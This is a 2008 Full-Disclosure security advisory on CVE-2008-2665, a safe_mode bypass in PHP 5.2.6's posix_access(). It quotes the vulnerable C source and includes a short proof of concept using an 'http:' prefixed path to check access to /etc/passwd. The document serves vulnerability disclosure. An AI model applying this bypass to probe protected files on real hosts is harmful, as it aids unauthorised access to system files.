[Full-disclosure] PHP 5.2.6 posix_access() (posix ext) safe_mode bypass

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.6 posix_access() (posix ext) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason.com
Date:

• • Written: 10.05.2008
• • Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 54

CVE: CVE-2008-2665
CWE: CWE-264
SecurityRisk: Low

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/54
Vendor: http://www.php.net

• — 0.Description —

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl
with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web
developers to write dynamically generated pages quickly.

posix_access ? Determine accessibility of a file

SYNOPSIS:

bool posix_access ( string $file [, int $mode ] )

http://pl2.php.net/manual/pl/function.posix-access.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL
VULNERABLE FUNCTIONS

• — 1. PHP 5.2.6 posix_access() safe_mode bypass —
  Let's see to posix_access() function

PHP_FUNCTION(posix_access)
{
long mode = 0;
int filename_len, ret;
char *filename, *path;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l", &filename, &filename_len,

&mode) == FAILURE) {
RETURN_FALSE;
}

    path = expand_filepath(filename, NULL TSRMLS_CC);
    
    if (!path) {
            POSIX_G(last_error) = EIO;
            RETURN_FALSE;
    }

    if (php_check_open_basedir_ex(path, 0 TSRMLS_CC) ||
                    (PG(safe_mode) && (!php_checkuid_ex(filename, NULL,

CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS)))) {
efree(path);
POSIX_G(last_error) = EPERM;
RETURN_FALSE;
}

    ret = access(path, mode);
    efree(path);

    if (ret) {
            POSIX_G(last_error) = errno;
            RETURN_FALSE;
    }

    RETURN_TRUE;

}

var_dump(posix_access("http://…/…/…/etc/passwd"))==True
var_dump(posix_access("/etc/passwd"))==False

Why?

Because path = expand_filepath(filename, NULL TSRMLS_CC); will change
"http://…/…/…/etc/passwd" to path=/etc/passwd

(PG(safe_mode) && (!php_checkuid_ex(filename, NULL, CHECKUID_CHECK_FILE_AND_DIR,
CHECKUID_NO_ERRORS))) will check realy path "http://…/…/…/etc/passwd". http:// is using in
php_checkuid_ex(), so safe_mode is bypassed.

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL
VULNERABLE FUNCTIONS

• — 2. How to Fix —
  Do not use safe_mode as a main safety

• — 3. Greets —
  sp3x Infospec schain p_e_a Chujwamwdupe

• — 4. Contact —
  Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
  Email: cxib [at] securityreason [dot] com
  GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
  http://securityreason.com
  http://securityreason.pl
  -----BEGIN PGP SIGNATURE-----
  Version: GnuPG v2.0.4 (FreeBSD)

iD8DBQFIWCC+W1OhNJH6DMURAsq4AJ0eC1qKOZVOJJB3XDRIhpufNe1qUwCfTWv0
n4Sg31DePRpr4h3PLouKFoA=
=6qwD
-----END PGP SIGNATURE-----

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/